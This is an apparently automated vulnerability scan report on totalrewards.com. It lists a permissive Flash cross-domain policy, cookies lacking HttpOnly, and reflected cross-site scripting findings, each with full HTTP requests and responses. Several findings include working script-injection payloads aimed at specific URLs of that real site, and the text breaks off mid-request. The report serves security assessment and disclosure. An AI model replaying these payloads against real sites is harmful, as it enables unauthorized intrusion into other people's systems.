XSS, Redirection, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Mar 19 09:34:01 CDT 2011.

Loading

1. Flash cross-domain policy

2. Cookie without HttpOnly flag set

2.1. http://www.totalrewards.com/CorporatePackageSearch.do

2.2. http://www.totalrewards.com/PackageSearch.do

2.3. http://www.totalrewards.com/ViewCancelReservation.do

2.4. http://www.totalrewards.com/total_rewards/benefits/benefits.jsp

2.5. http://www.totalrewards.com/total_rewards/overview/overview.jsp

2.6. http://www.totalrewards.com/total_rewards/rewards/rewards.jsp

3. Cross-site scripting (reflected)

3.1. http://www.totalrewards.com/MyTr.do [name of an arbitrarily supplied request parameter]

3.2. http://www.totalrewards.com/MyTr.do [name of an arbitrarily supplied request parameter]

3.3. http://www.totalrewards.com/TotalRewards/TotalRewards [name of an arbitrarily supplied request parameter]

3.4. http://www.totalrewards.com/TotalRewards/TotalRewards [name of an arbitrarily supplied request parameter]

3.5. http://www.totalrewards.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.6. http://www.totalrewards.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.7. http://www.totalrewards.com/casinos/grand-biloxi/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.8. http://www.totalrewards.com/casinos/grand-biloxi/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.9. http://www.totalrewards.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.10. http://www.totalrewards.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.11. http://www.totalrewards.com/casinos/imperial-palace/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.12. http://www.totalrewards.com/casinos/imperial-palace/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.13. http://www.totalrewards.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.14. http://www.totalrewards.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.15. http://www.totalrewards.com/casinos/planet-hollywood/hotel-casino/ [name of an arbitrarily supplied request parameter]

3.16. http://www.totalrewards.com/casinos/planet-hollywood/hotel-casino/ [name of an arbitrarily supplied request parameter]

3.17. http://www.totalrewards.com/casinos/rio/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.18. http://www.totalrewards.com/casinos/rio/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.19. http://www.totalrewards.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.20. http://www.totalrewards.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.21. http://www.totalrewards.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.22. http://www.totalrewards.com/casinos/tunica-roadhouse/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]

3.23. http://www.totalrewards.com/destinations/las-vegas/hotel-casinos/market-home.shtml [name of an arbitrarily supplied request parameter]

3.24. http://www.totalrewards.com/groups-meetings/index.html [name of an arbitrarily supplied request parameter]

3.25. http://www.totalrewards.com/groups-meetings/index.html [name of an arbitrarily supplied request parameter]

3.26. http://www.totalrewards.com/las-vegas-hotels.shtml [name of an arbitrarily supplied request parameter]

4. Cross-domain POST

4.1. http://www.totalrewards.com/CorporatePackageSearch.do

4.2. http://www.totalrewards.com/PackageSearch.do

4.3. http://www.totalrewards.com/brands/ballys/hotel-casinos/ballys-brand.shtml

4.4. http://www.totalrewards.com/brands/caesars/hotel-casinos/caesars-brand.shtml

4.5. http://www.totalrewards.com/casino-gambling/slots-finder/slot-finder-home.shtml

4.6. http://www.totalrewards.com/destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml

4.7. http://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml

4.8. http://www.totalrewards.com/destinations/tunica/hotel-casinos/market-home.shtml

4.9. http://www.totalrewards.com/index.shtml

5. Cross-domain Referer leakage

5.1. http://www.totalrewards.com/CorporatePackageSearch.do

5.2. http://www.totalrewards.com/PackageSearch.do

5.3. http://www.totalrewards.com/index.shtml

6. Cross-domain script include

6.1. http://www.totalrewards.com/%7B%7BimagePath%7D%7D

6.2. http://www.totalrewards.com/CorporatePackageSearch.do

6.3. http://www.totalrewards.com/PackageSearch.do

6.4. http://www.totalrewards.com/best-rate-guarantee.html

6.5. http://www.totalrewards.com/brands/ballys/hotel-casinos/ballys-brand.shtml

6.6. http://www.totalrewards.com/brands/caesars/hotel-casinos/caesars-brand.shtml

6.7. http://www.totalrewards.com/brands/harrahs/hotel-casinos/harrahs-brand.shtml

6.8. http://www.totalrewards.com/brands/horseshoe/hotel-casinos/horseshoe-brand.shtml

6.9. http://www.totalrewards.com/casino-gambling/slots-finder/slot-finder-home.shtml

6.10. http://www.totalrewards.com/casinos/wild-wild-west/hotel-casino/property-home.shtml

6.11. http://www.totalrewards.com/corporate/about-us-responsible-gaming.html

6.12. http://www.totalrewards.com/corporate/index.html

6.13. http://www.totalrewards.com/destinations/atlantic-city/hotel-casinos/market-home.shtml

6.14. http://www.totalrewards.com/destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml

6.15. http://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml

6.16. http://www.totalrewards.com/destinations/tunica/hotel-casinos/market-home.shtml

6.17. http://www.totalrewards.com/hot-deals/

6.18. http://www.totalrewards.com/index.shtml

6.19. http://www.totalrewards.com/legal.html

6.20. http://www.totalrewards.com/mobile/

6.21. http://www.totalrewards.com/our-casinos/

6.22. http://www.totalrewards.com/privacy.html

6.23. http://www.totalrewards.com/security.html

6.24. http://www.totalrewards.com/site-map.html

6.25. http://www.totalrewards.com/total_rewards/benefits/benefits.jsp

6.26. http://www.totalrewards.com/total_rewards/overview/overview.jsp

6.27. http://www.totalrewards.com/total_rewards/rewards/rewards.jsp

6.28. http://www.totalrewards.com/trademarks.html

7. Email addresses disclosed

7.1. http://www.totalrewards.com/javascript_includes/CalendarPopup.js

7.2. http://www.totalrewards.com/privacy.html

8. HTML does not specify charset

9. Content type incorrectly stated

9.1. http://www.totalrewards.com/PackageSearch.do

9.2. http://www.totalrewards.com/images/consumer/Flash/Videos/HomePageFlash.xml

9.3. http://www.totalrewards.com/xml/packages/undefined.xml



1. Flash cross-domain policy  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.totalrewards.com

Response

HTTP/1.1 200 OK
Content-Length: 5386
Content-Type: text/xml
Last-Modified: Fri, 11 Feb 2011 21:50:34 GMT
Accept-Ranges: bytes
ETag: "0b1a8b535cacb1:24e8"
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 13:44:27 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.spongecell.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahs.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.caesars.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.totalrewards.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harveystahoe.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahslaketahoe.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahslaughlin.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsakchin.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsrincon.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsjoliet.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsmetropolis.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.horseshoe-indiana.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.horseshoehammond.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahscouncilbluffs.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.horseshoecouncilbluffs.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahslouisianadowns.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsneworleans.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.horseshoebossiercity.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.grandcasinobiloxi.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahstunica.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.horseshoetunica.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.sheratontunica.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsnkc.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsstlouis.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.ballyslasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.billslasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.caesarspalace.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.flamingolasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahslasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsreno.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.imperialpalace.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.osheaslasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.parislasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.riolasvegas.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.ballysac.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.caesarsac.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahsresort.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.showboatcasino.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahscherokee.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.harrahschester.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.caesarswindsor.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.emgdev.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.impactradius.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.impactradius.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.7eer.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.miHarrahsRincon.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.tzhHarrahsRincon.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.vnHarrahsRincon.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.miCaesarsPalace.com " secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.tzhCaesarsPalace.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.szhCaesarsPalace.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.onelink-translations.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false" to-ports="*"/>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.totalrewards.com/CorporatePackageSearch.do  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /CorporatePackageSearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CorporatePackageSearch.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000ZvDSD7k714PY8jVA4P9dKYK:14tlevj56;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

2.2. http://www.totalrewards.com/PackageSearch.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /PackageSearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PackageSearch.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000sD6ZBwCkHW6DNwZpUY0_tqo:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en

Error 500: Define tag cannot set a null value

2.3. http://www.totalrewards.com/ViewCancelReservation.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /ViewCancelReservation.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ViewCancelReservation.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 19 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000R9F_Xa_fjGZCURWwqvLm3CL:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Location: http://www.totalrewards.com/hotel-reservations/?&view=reservationsearch&originalpage=/ViewCancelReservation.do
Content-Language: en



2.4. http://www.totalrewards.com/total_rewards/benefits/benefits.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /total_rewards/benefits/benefits.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /total_rewards/benefits/benefits.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:33 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000dhZvOdDQBG0U7xAmK5lGA_3:14tlevj56;Path=/
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: no-store, no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Page where patron can get information about various benefits
Creat
...[SNIP]...

2.5. http://www.totalrewards.com/total_rewards/overview/overview.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /total_rewards/overview/overview.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /total_rewards/overview/overview.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:33 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=00001C2WZelB9cbBQmxLD0-aNgv:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
   This page displays the overview of Total Rewards (trOverview.jsp)
   Cr
...[SNIP]...

2.6. http://www.totalrewards.com/total_rewards/rewards/rewards.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /total_rewards/rewards/rewards.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /total_rewards/rewards/rewards.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:34 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000qYtZ2n4v5YwPVAM7OOwpe2r:12qh2p7li;Path=/
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: no-store, no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Page where patron can get information about various rewards
Creati
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 26 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.totalrewards.com/MyTr.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /MyTr.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b3e3<script>alert(1)</script>ac1d922aacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /MyTr.do?7b3e3<script>alert(1)</script>ac1d922aacd=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:04 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 259
Location: https://www.totalrewards.com/MyTr.do?7b3e3<script>alert(1)</script>ac1d922aacd=1

<html><body>The requested resource was moved. It could be found here: <a href="https://www.totalrewards.com/MyTr.do?7b3e3<script>alert(1)</script>ac1d922aacd=1">https://www.totalrewards.com/MyTr.do?7b3e3<script>alert(1)</script>ac1d922aacd=1</a>
...[SNIP]...

3.2. http://www.totalrewards.com/MyTr.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /MyTr.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad198"><script>alert(1)</script>cbf6850c338 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /MyTr.do?ad198"><script>alert(1)</script>cbf6850c338=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:03 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 263
Location: https://www.totalrewards.com/MyTr.do?ad198"><script>alert(1)</script>cbf6850c338=1

<html><body>The requested resource was moved. It could be found here: <a href="https://www.totalrewards.com/MyTr.do?ad198"><script>alert(1)</script>cbf6850c338=1">https://www.totalrewards.com/MyTr.do?
...[SNIP]...

3.3. http://www.totalrewards.com/TotalRewards/TotalRewards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /TotalRewards/TotalRewards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><script>alert(1)</script>af00d96f63c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TotalRewards/TotalRewards?601d8"><script>alert(1)</script>af00d96f63c=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
